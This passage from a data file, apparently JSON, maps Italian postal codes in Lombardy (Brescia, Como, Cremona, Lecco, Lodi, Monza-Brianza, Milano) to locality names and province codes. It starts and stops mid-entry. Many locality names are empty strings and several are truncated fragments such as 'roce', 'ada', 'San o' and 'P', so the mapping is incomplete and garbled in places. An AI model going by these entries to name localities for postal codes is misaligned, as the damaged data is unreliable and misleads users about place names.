[["Cedegolo", "BS"]], "25052": [["", "BS"], ["Cogno", "BS"], ["Annunciata", "BS"], ["Piancogno", "BS"]], "25053": [["Malegno", "BS"]], "25054": [["Marone", "BS"]], "25055": [["Pisogne", "BS"], ["Toline", "BS"], ["Gratacasolo", "BS"]], "25056": [["", "BS"]], "25057": [["", "BS"]], "25058": [["Sulzano", "BS"]], "25059": [["", "BS"]], "25060": [ ["Pezzaze", "BS"], ["Cellatica", "BS"], ["", "BS"], ["Lodrino", "BS"], ["Polaveno", "BS"], ["Gombio", "BS"], ["Marcheno", "BS"], ["Stravignino", "BS"], ["Brozzo", "BS"], ["Fantasina", "BS"], ["Marmentino", "BS"], ["Collebeato", "BS"], ["Collio", "BS"], ["Lavone", "BS"], ["San Colombano", "BS"], ["", "BS"], ["Brione", "BS"], ], "25061": [["Irma", "BS"], ["Bovegno", "BS"]], "25062": [["", "BS"], ["Concesio", "BS"]], "25063": [["", "BS"], ["Magno", "BS"]], "25064": [["Piazza", "BS"], ["Ronco", "BS"], ["Mandolossa", "BS"], ["Gussago", "BS"]], "25065": [ ["", "BS"], ["", "BS"], ["Pieve", "BS"], ["Sant'Apollonio", "BS"], ["Lumezzane", "BS"], ["", "BS"], ], "25068": [["", "BS"], ["Zanano", "BS"], ["Sarezzo", "BS"]], "25069": [["Carcina", "BS"], ["Cogozzo", "BS"], ["", "BS"]], "25070": [ ["Preseglie", "BS"], ["Trebbio", "BS"], ["", "BS"], ["Mura", "BS"], ["Barghe", "BS"], ["Capovalle", "BS"], ["Sottocastello", "BS"], ["", "BS"], ["Anfo", "BS"], ["Gazzane", "BS"], ["", "BS"], ["Casto", "BS"], ["", "BS"], ["Caino", "BS"], ["", "BS"], ["Livemmo", "BS"], ["Bione", "BS"], ["", "BS"], ], "25071": [["Agnosine", "BS"]], "25072": [["Bagolino", "BS"]], "25073": [["Bovezzo", "BS"]], "25074": [["Idro", "BS"], ["Lavenone", "BS"], ["Crone", "BS"]], "25075": [["Nave", "BS"]], "25076": [["Odolo", "BS"]], "25077": [["", "BS"], ["Roe'", "BS"]], "25078": [["", "BS"], ["", "BS"], ["Vestone", "BS"], ["Nozza", "BS"]], "25079": [["Vobarno", "BS"], ["Carpeneda", "BS"], ["Pompegnino", "BS"], ["Degagna", "BS"]], "25080": [ ["", "BS"], ["Valvestino", "BS"], ["", "BS"], ["", "BS"], ["Mazzano", "BS"], ["Ciliverghe", "BS"], ["", "BS"], ["", "BS"], ["Soiano", "BS"], ["Castello", "BS"], ["Molinetto", "BS"], ["Gardola", "BS"], ["Serle", "BS"], ["Magasa", "BS"], ["Paitone", "BS"], ["", "BS"], ["", "BS"], ["", "BS"], ["Nuvolento", "BS"], ["Moerna", "BS"], ["Chiesa", "BS"], ["Solarolo", "BS"], ["Case Nuove", "BS"], ["", "BS"], ["Nuvolera", "BS"], ["", "BS"], ["Prevalle", "BS"], ["Muscoline", "BS"], ["Tignale", "BS"], ["Raffa", "BS"], ], "25081": [["Bedizzole", "BS"], ["Campagnola", "BS"]], "25082": [["", "BS"], ["", "BS"], ["Botticino", "BS"], ["San Gallo", "BS"]], "25083": [["", "BS"], ["", "BS"], ["", "BS"], ["Montecucco", "BS"]], "25084": [["Gargnano", "BS"], ["Bogliaco", "BS"], ["Navazzo", "BS"]], "25085": [["San Giacomo", "BS"], ["San Biagio", "BS"], ["Sopraponte", "BS"], ["Gavardo", "BS"]], "25086": [["Rezzato", "BS"], ["", "BS"]], "25087": [["Barbarano", "BS"], ["Campoverde", "BS"], ["Salo'", "BS"]], "25088": [["", "BS"], ["Maderno", "BS"]], "25089": [["Bostone", "BS"], ["Villanuova Sul Clisi", "BS"]], "25100": [["Brescia", "BS"]], "25121": [["Brescia", "BS"]], "25122": [["Brescia", "BS"]], "25123": [["Brescia", "BS"]], "25124": [["Brescia", "BS"]], "25125": [["Brescia", "BS"]], "25126": [["Brescia", "BS"]], "25127": [["Brescia", "BS"]], "25128": [["Brescia", "BS"]], "25129": [["Brescia", "BS"], ["", "BS"]], "25131": [["Fornaci", "BS"], ["Brescia", "BS"]], "25132": [["Brescia", "BS"], ["", "BS"]], "25133": [["Brescia", "BS"], ["Mompiano", "BS"]], "25134": [["", "BS"], ["Brescia", "BS"]], "25135": [["Brescia", "BS"], ["Caionvico", "BS"], ["", "BS"]], "25136": [["Stocchetta", "BS"], ["Brescia", "BS"]], "22010": [ ["", "CO"], ["Urio", "CO"], ["Stazzona", "CO"], ["", "CO"], ["Germasino", "CO"], ["Peglio", "CO"], ["", "CO"], ["Plesio", "CO"], ["", "CO"], ["Laglio", "CO"], ["Brienno", "CO"], ["Musso", "CO"], ["Albogasio", "CO"], ["", "CO"], ["Livo", "CO"], ["Montemezzo", "CO"], ["Calozzo", "CO"], ["Ossuccio", "CO"], ["Cusino", "CO"], ["Carlazzo", "CO"], ["Garzeno", "CO"], ["Acquaseria", "CO"], ["", "CO"], ["", "CO"], ["Cremia", "CO"], ["Oria", "CO"], ["", "CO"], ["Mezzegra", "CO"], ["", "CO"], ["Azzano", "CO"], ["Codogna", "CO"], ["", "CO"], ["Trezzone", "CO"], ["", "CO"], ["Colonno", "CO"], ["Sorico", "CO"], ["Argegno", "CO"], ["Moltrasio", "CO"], ["", "CO"], ["Valsolda", "CO"], ["Cavargna", "CO"], ["", "CO"], ["", "CO"], ["Sant'Abbondio", "CO"], ["Corrido", "CO"], ["", "CO"], ["", "CO"], ["Rezzonico", "CO"], ["", "CO"], ["", "CO"], ], "22011": [["Cadenabbia", "CO"], ["Griante", "CO"]], "22012": [["Cernobbio", "CO"]], "22013": [["Vercana", "CO"], ["Domaso", "CO"]], "22014": [["Dongo", "CO"]], "22015": [["Gravedona", "CO"]], "22016": [["Lenno", "CO"], ["Tremezzina", "CO"]], "22017": [["Menaggio", "CO"]], "22018": [["Porlezza", "CO"], ["Cima", "CO"]], "22019": [["Tremezzo", "CO"]], "22020": [ ["Nesso", "CO"], ["", "CO"], ["Pare'", "CO"], ["Schignano", "CO"], ["", "CO"], ["", "CO"], ["Veleso", "CO"], ["", "CO"], ["Lemna", "CO"], ["", "CO"], ["Boscone", "CO"], ["Pigra", "CO"], ["Zelbio", "CO"], ["Gaggino", "CO"], ["Blevio", "CO"], ["", "CO"], ["", "CO"], ["Laino", "CO"], ["Pellio", "CO"], ["Dizzasco", "CO"], ["Torno", "CO"], ["Camnago", "CO"], ["Faloppio", "CO"], ["Occagno", "CO"], ["Bizzarone", "CO"], ["Ponna", "CO"], ["Drezzo", "CO"], ], "22021": [["Bellagio", "CO"], ["", "CO"]], "22022": [["", "CO"]], "22023": [["", "CO"]], "22024": [["", "CO"], ["Scaria", "CO"]], "22025": [["Lezzeno", "CO"]], "22026": [["Maslianico", "CO"]], "22027": [["Ronago", "CO"]], "22028": [["Blessagno", "CO"], ["", "CO"]], "22029": [["", "CO"]], "22030": [ ["Lipomo", "CO"], ["Castelmarte", "CO"], ["Corneno", "CO"], ["Orsenigo", "CO"], ["Penzano", "CO"], ["Lasnigo", "CO"], ["", "CO"], ["Galliano", "CO"], ["Montorfano", "CO"], ["Rezzago", "CO"], ["Civenna", "CO"], ["Caglio", "CO"], ["Magreglio", "CO"], ["", "CO"], ["Barni", "CO"], ["Eupilio", "CO"], ["Pusiano", "CO"], ["Sormano", "CO"], ["Proserpio", "CO"], ], "22031": [["Albavilla", "CO"]], "22032": [["", "CO"]], "22033": [["Asso", "CO"]], "22034": [["Brunate", "CO"]], "22035": [["Canzo", "CO"]], "22036": [["Erba", "CO"], ["Arcellasco", "CO"]], "22037": [["", "CO"]], "22038": [["Tavernerio", "CO"], ["Solzago", "CO"]], "22039": [["Valbrona", "CO"], ["Osigo", "CO"]], "22040": [ ["Brenna", "CO"], ["", "CO"], ["", "CO"], ["Alserio", "CO"], ["Nobile", "CO"], ["", "CO"], ["", "CO"], ["Monguzzo", "CO"], ], "22041": [["Colverde", "CO"], ["", "CO"], ["Gironico", "CO"]], "22042": [["Cavallasca", "CO"]], "22043": [["Cagno", "CO"], ["Solbiate", "CO"]], "22044": [["Inverigo", "CO"], ["Cremnago", "CO"], ["", "CO"]], "22045": [["Lambrugo", "CO"]], "22046": [["Merone", "CO"]], "22060": [ ["Cabiate", "CO"], ["", "CO"], ["Cucciago", "CO"], ["", "CO"], ["Novedrate", "CO"], ["Montesolaro", "CO"], ["Arosio", "CO"], ["Carimate", "CO"], ["Carugo", "CO"], ], "22063": [ ["'", "CO"], ["", "CO"], ["'", "CO"], ["", "CO"], ["Cantu'", "CO"], ["'", "CO"], ], "22066": [["", "CO"], ["Perticato", "CO"]], "22069": [["Rovellasca", "CO"]], "22070": [ ["Luisago", "CO"], ["Bregnano", "CO"], ["Puginate", "CO"], ["Lucino", "CO"], ["", "CO"], ["", "CO"], ["Guanzate", "CO"], ["Portichetto", "CO"], ["", "CO"], ["", "CO"], ["Intimiano", "CO"], ["Rodero", "CO"], ["Capiago", "CO"], ["Minoprio", "CO"], ["", "CO"], ["Casnate", "CO"], ["Bulgarograsso", "CO"], ["", "CO"], ["Grandate", "CO"], ["", "CO"], ["", "CO"], ["Binago", "CO"], ["", "CO"], ["", "CO"], ["Carbonate", "CO"], ["Albiolo", "CO"], ["", "CO"], ["", "CO"], ["", "CO"], ["Beregazzo", "CO"], ["Concagno", "CO"], ["Montano", "CO"], ["Cirimido", "CO"], ["Valmorea", "CO"], ["", "CO"], ["", "CO"], ["", "CO"], ["Fenegro'", "CO"], ["", "CO"], ["Veniano", "CO"], ["Figliaro", "CO"], ["", "CO"], ], "22071": [["Bulgorello", "CO"], ["", "CO"], ["Cadorago", "CO"]], "22072": [["Cermenate", "CO"]], "22073": [["Andrate", "CO"], ["", "CO"], ["Molinetto", "CO"]], "22074": [["Lomazzo", "CO"], ["Manera", "CO"]], "22075": [["", "CO"]], "22076": [["Mozzate", "CO"]], "22077": [["", "CO"]], "22078": [["Turate", "CO"]], "22079": [["", "CO"]], "22100": [ ["", "CO"], ["Civiglio", "CO"], ["Breccia", "CO"], ["Lora", "CO"], ["Rebbio", "CO"], ["Camerlata", "CO"], ["Tavernola", "CO"], ["", "CO"], ["Albate", "CO"], ["Como", "CO"], ["", "CO"], ], "26010": [ ["", "CR"], ["", "CR"], ["Capralba", "CR"], ["", "CR"], ["Olmeneta", "CR"], ["", "CR"], ["", "CR"], ["Chieve", "CR"], ["", "CR"], ["Montodine", "CR"], ["Bolzone", "CR"], ["Salvirola", "CR"], ["Zappello", "CR"], ["Cremosano", "CR"], ["Credera", "CR"], ["Fiesco", "CR"], ["Dovera", "CR"], ["Moscazzano", "CR"], ["Sergnano", "CR"], ["Camisano", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["Casalsigone", "CR"], ["Ricengo", "CR"], ["Rovereto", "CR"], ["Castelvisconti", "CR"], ["Pianengo", "CR"], ["Offanengo", "CR"], ["Rubbiano", "CR"], ["Pozzaglio", "CR"], ["", "CR"], ["", "CR"], ["Capergnanica", "CR"], ["Izano", "CR"], ["", "CR"], ["Azzanello", "CR"], ["", "CR"], ], "26011": [["Casalbuttano", "CR"], ["Casalbuttano Ed Uniti", "CR"]], "26012": [["Castelleone", "CR"]], "26013": [ ["Crema", "CR"], ["Sairano", "CR"], ["Ombriano", "CR"], ["Santa ", "CR"], ["Sabbioni", "CR"], ], "26014": [["", "CR"], ["Romanengo", "CR"]], "26015": [["Soresina", "CR"]], "26016": [["", "CR"]], "26017": [["", "CR"], ["Quintano", "CR"], ["", "CR"], ["Pieranica", "CR"]], "26018": [["Trigolo", "CR"]], "26019": [["Vailate", "CR"]], "26020": [ ["", "CR"], ["Corte De' Cortesi Con Cignone", "CR"], ["Madignano", "CR"], ["", "CR"], ["Gombito", "CR"], ["Cignone", "CR"], ["Corte De' Cortesi", "CR"], ["Formigara", "CR"], ["Spinadesco", "CR"], ["Bordolano", "CR"], ["Casalmorano", "CR"], ["Fengo", "CR"], ["Agnadello", "CR"], ["Ticengo", "CR"], ["", "CR"], ["", "CR"], ["Scannabue", "CR"], ["Genivolta", "CR"], ["", "CR"], ["", "CR"], ["San Bassano", "CR"], ], "26021": [["Barzaniga", "CR"], ["Annicco", "CR"]], "26022": [["", "CR"], ["Castelverde", "CR"], ["", "CR"]], "26023": [["Farfengo", "CR"], ["", "CR"], ["", "CR"]], "26024": [["", "CR"]], "26025": [["Pandino", "CR"], ["Nosadello", "CR"]], "26026": [["Pizzighettone", "CR"], ["Roggione", "CR"], ["Regona", "CR"]], "26027": [["", "CR"]], "26028": [["", "CR"], ["", "CR"], ["i", "CR"]], "26029": [["Gallignano", "CR"], ["Soncino", "CR"]], "26030": [ ["Spineda", "CR"], ["Gabbioneta", "CR"], ["", "CR"], ["", "CR"], ["Volongo", "CR"], ["Malagnino", "CR"], ["Cicognolo", "CR"], ["", "CR"], ["Calvatone", "CR"], ["Voltido", "CR"], ["Tornata", "CR"], ["", "CR"], ["Binanuova", "CR"], ["", "CR"], ["", "CR"], ["Casteldidone", "CR"], ["", "CR"], ], "26031": [["", "CR"]], "26032": [["Ostiano", "CR"]], "26033": [["", "CR"], ["", "CR"], ["Pescarolo", "CR"]], "26034": [["Piadena", "CR"], ["Drizzona", "CR"]], "26035": [["", "CR"]], "26036": [[" Ed Uniti", "CR"], ["", "CR"]], "26037": [["roce", "CR"]], "26038": [["", "CR"], ["", "CR"], ["", "CR"]], "26039": [["", "CR"], ["Vescovato", "CR"]], "26040": [ ["Gussola", "CR"], ["Derovere", "CR"], ["", "CR"], ["Bonemerse", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["Castelponzone", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ], "26041": [ ["Casalbellotto", "CR"], ["Casalmaggiore", "CR"], ["Vicomoscano", "CR"], ["Roncadello", "CR"], ["Quattrocase", "CR"], ["Vicoboneghisio", "CR"], ["Agoiolo", "CR"], ["Vicobellignano", "CR"], ], "26042": [["", "CR"]], "26043": [["Persichello", "CR"], ["Dosimo", "CR"], ["", "CR"]], "26044": [["Grontardo", "CR"], ["Levata", "CR"]], "26045": [["", "CR"]], "26046": [["", "CR"]], "26047": [["", "CR"]], "26048": [["", "CR"], ["Sospiro", "CR"]], "26049": [["", "CR"]], "26100": [ ["", "CR"], ["Boschetto", "CR"], ["", "CR"], ["Migliaro", "CR"], ["Maristella", "CR"], ["Cremona", "CR"], ], "23801": [["Calolziocorte", "LC"], ["Rossino", "LC"]], "23802": [["Carenno", "LC"]], "23804": [["", "LC"]], "23805": [["Erve", "LC"]], "23806": [["", "LC"], ["", "LC"], ["Valcava", "LC"], ["Favirano", "LC"]], "23807": [["Merate", "LC"], ["", "LC"]], "23808": [["Vercurago", "LC"]], "23811": [["Ballabio", "LC"], ["Morterone", "LC"]], "23813": [["Cortenova", "LC"], ["Bindo", "LC"]], "23814": [["Cremeno", "LC"], ["Maggio", "LC"]], "23815": [["Introbio", "LC"]], "23816": [["Barzio", "LC"]], "23817": [["Moggio", "LC"], ["", "LC"]], "23818": [["Pasturo", "LC"]], "23819": [["Primaluna", "LC"], ["Cortabbio", "LC"]], "23821": [["Crebbio", "LC"], ["", "LC"]], "23822": [["Bellano", "LC"], ["Vestreno", "LC"]], "23823": [["", "LC"], ["Colico", "LC"]], "23824": [["Dervio", "LC"], ["Dorio", "LC"]], "23825": [["", "LC"]], "23826": [["", "LC"]], "23827": [["Lierna", "LC"]], "23828": [["Perledo", "LC"]], "23829": [["Fiumelatte", "LC"], ["Varenna", "LC"]], "23831": [["Casargo", "LC"]], "23832": [["Margno", "LC"], ["", "LC"]], "23833": [["Pagnona", "LC"]], "23834": [["Premana", "LC"]], "23835": [["Sueglio", "LC"], ["Introzzo", "LC"]], "23836": [["Tremenico", "LC"]], "23837": [["Taceno", "LC"], ["Parlasco", "LC"]], "23838": [["Vendrogno", "LC"]], "23841": [["", "LC"]], "23842": [["", "LC"]], "23843": [["Dolzago", "LC"]], "23844": [["Sirone", "LC"]], "23845": [["", "LC"], ["Camisasca", "LC"]], "23846": [["Brongio", "LC"], ["", "LC"]], "23847": [["Luzzana", "LC"], ["Molteno", "LC"]], "23848": [["Oggiono", "LC"], ["Ello", "LC"]], "23849": [["Rogeno", "LC"], ["Casletto", "LC"]], "23851": [["Galbiate", "LC"], ["", "LC"], ["", "LC"]], "23852": [["Garlate", "LC"]], "23854": [["Olginate", "LC"]], "23855": [["Pescate", "LC"]], "23857": [["Valgreghentino", "LC"]], "23861": [["", "LC"]], "23862": [["Civate", "LC"]], "23864": [["Malgrate", "LC"]], "23865": [["Limonta", "LC"], ["", "LC"], ["Onno", "LC"]], "23867": [["Suello", "LC"]], "23868": [["Caserta", "LC"], ["Valmadrera", "LC"]], "23870": [["", "LC"]], "23871": [["Lomagna", "LC"]], "23873": [["Missaglia", "LC"], ["Maresso", "LC"]], "23874": [["Montevecchia", "LC"], ["", "LC"]], "23875": [["Osnago", "LC"]], "23876": [["", "LC"]], "23877": [["", "LC"]], "23878": [["", "LC"]], "23879": [["", "LC"], ["Verderio", "LC"]], "23880": [ ["Campofiorenzo", "LC"], ["Casatenovo", "LC"], ["Galgiana", "LC"], ["Rimoldo", "LC"], ["Rogoredo", "LC"], ["Valaperta", "LC"], ["California", "LC"], ], "23881": [["Airuno", "LC"]], "23883": [["Beverate", "LC"], ["Brivio", "LC"]], "23884": [["Caraverio", "LC"], ["Cologna", "LC"], ["", "LC"]], "23885": [["Calco", "LC"], ["Arlate", "LC"]], "23886": [["", "LC"], ["Nava", "LC"]], "23887": [["Monticello", "LC"], ["Canova", "LC"], ["", "LC"]], "23888": [["", "LC"], ["Rovagnate", "LC"], ["Perego", "LC"]], "23889": [["'", "LC"]], "23890": [["Barzago", "LC"]], "23891": [["Barzano'", "LC"]], "23892": [["Bulciago", "LC"]], "23893": [["", "LC"]], "23894": [["Cremella", "LC"]], "23895": [["Cibrone", "LC"], ["Nibionno", "LC"], ["Tabiago", "LC"]], "23896": [["Sirtori", "LC"], ["", "LC"]], "23897": [["Vigano'", "LC"]], "23898": [["Imbersago", "LC"]], "23899": [["Robbiate", "LC"]], "23900": [["Lecco", "LC"]], "26811": [["", "LO"]], "26812": [["", "LO"], ["Casoni", "LO"]], "26813": [["Graffignana", "LO"]], "26814": [["Livraga", "LO"]], "26815": [["", "LO"], ["Massalengo", "LO"]], "26816": [["", "LO"]], "26817": [["ada", "LO"]], "26818": [["", "LO"], ["Bargano", "LO"]], "26821": [["Bertonico", "LO"]], "26822": [["Brembio", "LO"]], "26823": [["", "LO"], ["Camairago", "LO"]], "26824": [["", "LO"]], "26825": [["Basiasco", "LO"], ["Mairago", "LO"]], "26826": [["Secugnago", "LO"]], "26827": [["", "LO"]], "26828": [["Melegnanello", "LO"], ["", "LO"]], "26831": [["Cologno", "LO"], ["Casalmaiocco", "LO"]], "26832": [["", "LO"], ["Galgagnano", "LO"]], "26833": [["Comazzo", "LO"], ["Merlino", "LO"]], "26834": [["Cadilana", "LO"], ["", "LO"], ["", "LO"], ["Terraverde", "LO"]], "26835": [["Crespiatica", "LO"]], "26836": [["", "LO"]], "26837": [["Mulazzano", "LO"], ["", "LO"], ["Quartiano", "LO"]], "26838": [["", "LO"], ["Villavesco", "LO"], ["Tavazzano", "LO"]], "26839": [["", "LO"]], "26841": [["Casalpusterlengo", "LO"], ["Zorlesco", "LO"]], "26842": [["Cornovecchio", "LO"], ["", "LO"]], "26843": [["Maccastorna", "LO"], ["", "LO"], ["Meleti", "LO"]], "26844": [["Cavacurta", "LO"]], "26845": [["Codogno", "LO"]], "26846": [["", "LO"]], "26847": [["Maleo", "LO"]], "26848": [["", "LO"]], "26849": [["", "LO"]], "26851": [["", "LO"]], "26852": [["", "LO"], ["Mairano", "LO"]], "26853": [["", "LO"]], "26854": [["", "LO"], ["", "LO"], ["", "LO"]], "26855": [["", "LO"]], "26856": [["", "LO"], ["Mirabello", "LO"]], "26857": [["", "LO"]], "26858": [["Sordio", "LO"]], "26859": [["", "LO"]], "26861": [["Fombio", "LO"], ["Retegno", "LO"]], "26862": [["Guardamiglio", "LO"]], "26863": [["", "LO"]], "26864": [["", "LO"]], "26865": [["San o", "LO"]], "26866": [["", "LO"], ["Marudo", "LO"], ["", "LO"], ["Vidardo", "LO"]], "26867": [["Somaglia", "LO"], ["", "LO"]], "26900": [["", "LO"], ["Lodi", "LO"]], "20811": [["Binzago", "MB"], ["", "MB"], ["", "MB"], ["", "MB"]], "20812": [["", "MB"], ["", "MB"], ["Mombello", "MB"], ["Limbiate", "MB"]], "20813": [["Masciago", "MB"], ["Bovisio-Masciago", "MB"], ["Bovisio", "MB"]], "20814": [["Valera", "MB"], ["Varedo", "MB"]], "20815": [["Cogliate", "MB"]], "20816": [["", "MB"], ["", "MB"]], "20821": [["Meda", "MB"]], "20822": [["Baruccana", "MB"], ["Seveso", "MB"]], "20823": [["", "MB"], ["Cimnago", "MB"], ["Camnago", "MB"]], "20824": [["Lazzate", "MB"]], "20825": [["Barlassina", "MB"]], "20826": [["Misinto", "MB"], ["", "MB"]], "20831": [["Seregno", "MB"]], "20832": [["Desio", "MB"]], "20833": [["", "MB"], ["Paina", "MB"], ["Giussano", "MB"]], "20834": [["", "MB"]], "20835": [["Muggio'", "MB"], ["Taccona", "MB"]], "20836": [["Capriano", "MB"], ["Briosco", "MB"], ["Fornaci", "MB"]], "20837": [["", "MB"]], "20838": [["Renate", "MB"]], "20841": [["", "MB"], ["Agliate", "MB"]], "20842": [["", "MB"], ["", "MB"], ["Zoccorino", "MB"]], "20843": [["", "MB"]], "20844": [["Tregasio", "MB"], ["Triuggio", "MB"], ["Canonica", "MB"]], "20845": [["Sovico", "MB"]], "20846": [["Macherio", "MB"]], "20847": [["Albiate", "MB"]], "20851": [["Santa Margherita", "MB"], ["Lissone", "MB"]], "20852": [["Villasanta", "MB"]], "20853": [["Biassono", "MB"]], "20854": [["", "MB"]], "20855": [["Peregallo", "MB"], ["Lesmo", "MB"]], "20856": [["Correzzana", "MB"]], "20857": [["Camparada", "MB"]], "20861": [["Brugherio", "MB"], ["San Damiano", "MB"]], "20862": [["Arcore", "MB"]], "20863": [["Concorezzo", "MB"]], "20864": [["", "MB"], ["Omate", "MB"]], "20865": [["Velate", "MB"], ["Usmate Velate", "MB"]], "20866": [["Carnate", "MB"]], "20867": [["Caponago", "MB"]], "20871": [["Velasca", "MB"], ["Vimercate", "MB"], ["Oreno", "MB"]], "20872": [["", "MB"], ["Colnago", "MB"], ["", "MB"]], "20873": [["", "MB"]], "20874": [["Busnago", "MB"]], "20875": [["", "MB"]], "20876": [["Ornago", "MB"]], "20877": [["Roncello", "MB"]], "20881": [["Villanova", "MB"], ["Bernareggio", "MB"]], "20882": [["Bellusco", "MB"]], "20883": [["Mezzago", "MB"]], "20884": [["Sulbiate", "MB"]], "20885": [["", "MB"]], "20886": [["Aicurzio", "MB"]], "20900": [["San Fruttuoso", "MB"], ["Monza", "MB"]], "20001": [["Inveruno", "MI"]], "20002": [["Ossona", "MI"]], "20003": [["Casorezzo", "MI"]], "20004": [["Arluno", "MI"]], "20005": [["P", "MI"]], "20006": [["", "MI"]], "20007": [["Cornaredo", "MI"]], "20008": [["Bareggio", "MI"]], "20009": [["Vittuone", "MI"]], "20010": [ ["Mesero", "MI"], ["", "MI"], ["Rogorotto", "MI"], ["", "MI"], ["", "MI"], ["Casate", "MI"], ["Mantegazza", "MI"], ["", "MI"], ["Furato", "MI"], ["Buscate", "MI"], ["", "MI"], ["Casone", "MI"], ], "20011": [["Corbetta", "MI"], ["Battuello", "MI"], ["Cerello", "MI"]], "20012": [["Cuggiono", "MI"]], "20013": [["Ponte Nuovo", "MI"], ["Magenta", "MI"]], "20014": [["Nerviano", "MI"], ["", "MI"]], "20015": [["Parabiago", "MI"], ["Villastanza", "MI"]], "20016": [["Pero", "MI"], ["Cerchiate", "MI"]], "20017": [ ["Lucernate", "MI"], ["", "MI"], ["Terrazzano", "MI"], ["Passirana", "MI"], ["Rho", "MI"], ], "20018": [["Sedriano", "MI"]], "20019": [["Vighignolo", "MI"], ["", "MI"]], "20020": [ ["", "MI"], ["Bienate", "MI"], ["", "MI"], ["Vanzaghello", "MI"], ["Magnago", "MI"], ["Arconate", "MI"], ["Nosate", "MI"], ["Barbaiana", "MI"], ["", "MI"], ], "20021": [["Baranzate", "MI"], ["", "MI"], ["Bollate", "MI"]], "20022": [["", "MI"]], "20023": [["Cantalupo", "MI"], ["", "MI"]], "20024": [["", "MI"], ["", "MI"]], "20025": [["Legnano", "MI"]], "20026": [["", "MI"]], "20027": [["Rescalda", "MI"], ["Rescaldina", "MI"]], "20028": [["", "MI"]], "20029": [["Turbigo", "MI"]], "20030": [["Senago", "MI"]], "20031": [["Cesate", "MI"]], "20032": [["Cormano", "MI"], ["Brusuglio", "MI"], ["Ospitaletto", "MI"]], "20033": [["Solaro", "MI"]], "20034": [["", "MI"]], "20035": [["", "MI"]], "20036": [["Dairago", "MI"]], "20037": [["", "MI"], ["", "MI"]], "20038": [["", "MI"]], "20039": [["Canegrate", "MI"]], "20040": [["", "MI"], ["", "MI"], ["Cambiago", "MI"]], "20041": [["Bussero", "MI"]], "20042": [["", "MI"]], "20043": [["Vanzago", "MI"]], "20044": [["Arese", "MI"]], "20045": [["Lainate", "MI"]], "20046": [["Cisliano", "MI"]], "20047": [["Cusago", "MI"]], "20048": [["Pantigliate", "MI"]], "20049": [["Settala", "MI"]], "20050": [["Liscate", "MI"]], "20051": [["", "MI"]], "20052": [["Vignate", "MI"]], "20053": [["Rodano", "MI"]], "20054": [["Segrate", "MI"]], "20055": [["Vimodrone", "MI"]], "20056": [["Concesa", "MI"], ["", "MI"], ["Grezzago", "MI"]], "20057": [["Assago", "MI"]], "20058": [["", "MI"]], "20059": [["Casarile", "MI"]], "20060": [ ["Trecella", "MI"], ["Triginto", "MI"], ["", "MI"], ["", "MI"], ["", "MI"], ["Bustighera", "MI"], ["Gessate", "MI"], ["", "MI"], ["Truccazzano", "MI"], ["", "MI"], ["", "MI"], ["Masate", "MI"], ["Mombretto", "MI"], ["", "MI"], ["Basiano", "MI"], ["Albignano", "MI"], ["Bornago", "MI"], ["", "MI"], ["Vigliano", "MI"], ["Balbiano", "MI"], ], "20061": [["Carugate", "MI"]], "20062": [["", "MI"], ["", "MI"], ["", "MI"]], "20063": [["", "MI"]], "20064": [["Gorgonzola", "MI"]], "20065": [["Inzago", "MI"]], "20066": [["Melzo", "MI"]], "20067": [["Paullo", "MI"], ["Tribiano", "MI"]], "20068": [ ["Mezzate", "MI"], ["", "MI"], ["Bettola", "MI"], ["", "MI"], ["Zeloforomagno", "MI"], ["Bellaria", "MI"], ["", "MI"], ["Linate", "MI"], ], "20069": [["'Adda", "MI"]], "20070": [ ["Dresano", "MI"], ["Cerro Al Lambro", "MI"], ["San Zenone Al Lambro", "MI"], ["Sarmazzano", "MI"], ["", "MI"], ["", "MI"], ["Riozzo", "MI"], ], "20071": [["", "MI"], ["Vermezzo", "MI"]], "20072": [["", "MI"]], "20073": [["Opera", "MI"]], "20074": [["Carpiano", "MI"]], "20075": [["Colturano", "MI"]], "20076": [["Mediglia", "MI"]], "20077": [["Melegnano", "MI"]], "20078": [["San Colombano Al Lambro", "MI"]], "20079": [["Basiglio", "MI"]], "20080": [ ["Calvignasco", "MI"], ["San Pietro Cusico", "MI"], ["Bubbiano", "MI"], ["Moirago", "MI"], ["Besate", "MI"], ["Moncucco", "MI"], ["Ozzero", "MI"], ["Pasturago", "MI"], ["Albairate", "MI"], ["Badile", "MI"], ["Vernate", "MI"], ], "20081": [["", "MI"], ["Abbiategrasso", "MI"], ["Morimondo", "MI"]], "20082": [["Noviglio", "MI"], ["Binasco", "MI"], ["Santa Corinna", "MI"]], "20083": [["San Vito", "MI"], ["Gaggiano", "MI"], ["Vigano", "MI"]], "20084": [["Lacchiarella", "MI"]], "20085": [["Locate Di Triulzi", "MI"]], "20086": [["", "MI"]], "20087": [["", "MI"], ["", "MI"], ["Casterno", "MI"]], "20088": [["Rosate", "MI"], ["", "MI"]], "20089": [["Rozzano", "MI"], ["", "MI"]], "20090": [ ["Sporting Mirasole", "MI"], ["Trezzano Sul Naviglio", "MI"], ["", "MI"], ["Noverasco", "MI"], ["", "MI"], ["Lucino", "MI"], ["Caleppio", "MI"], ["", "MI"], ["Zingone", "MI"], ["Zingone Di Trezzano Sul Naviglio", "MI"], ["Premenugo", "MI"], ["Novegro", "MI"], ["Tregarezzo", "MI"], ["Monzoro", "MI"], ["Fizzonasco", "MI"], ["", "MI"], ["Millepini", "MI"], ["Buccinasco", "MI"], ], "20091": [["Bresso", "MI"]], "20092": [["", "MI"]], "20093": [["", "MI"], ["", "MI"]], "20094": [["Corsico", "MI"]], "20095": [["Milanino", "MI"], ["", "MI"]], "20096": [["Pioltello", "MI"], ["Limito", "MI"], ["Seggiano", "MI"]], "20097": [["San ", "MI"], ["Poasco", "MI"], ["Metanopoli", "MI"], ["Sorigherio", "MI"]], "20098": [["", "MI"], ["", "MI"], ["", "MI"]], "20099": [["", "MI"]], "20121": [["Milano", "MI"]], "20122": [["Milano", "MI"]], "20123": [["Milano", "MI"]], "20124": [["Milano", "MI"]], "20125": [["Milano", "MI"], ["Greco", "MI"], ["Gorla", "MI"], ["Precotto", "MI"]], "20126": [["Milano", "MI"]], "20127": [["Milano", "MI"], ["Crescenzago", "MI"]], "20128": [["Milano", "MI"]], "20129": [["Milano", "MI"]], "20131": [["Milano", "MI"]], "20132": [["Milano", "MI"]], "20133": [["Milano", "MI"]], "20134": [["Lambrate", "MI"], ["Milano", "MI"]], "20135": [["Milano", "MI"]], "20136": [["Milano", "MI"]], "20137": [["Milano", "MI"]], "20138": 